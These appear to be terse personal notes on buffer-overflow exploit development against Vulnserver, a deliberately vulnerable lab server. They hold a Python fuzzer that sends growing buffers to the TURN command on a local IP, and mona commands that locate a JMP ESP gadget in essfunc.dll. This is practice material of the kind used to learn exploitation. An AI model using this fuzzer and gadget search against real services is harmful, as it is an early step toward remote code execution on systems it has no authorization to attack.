Memory Overview-

Fuzzer Code- #!/user/bin/python import socket import sys buffer=["A"] counter=100 while len(buffer) <=30: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "Fuzzing vulnserver with %s bytes" % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.128',9999)) s.send(('TURN /.:/' +string)) s.close() !mona modules JMP ESP=FFE4 !mona find -s "\xff\xe4" -m essfunc.dll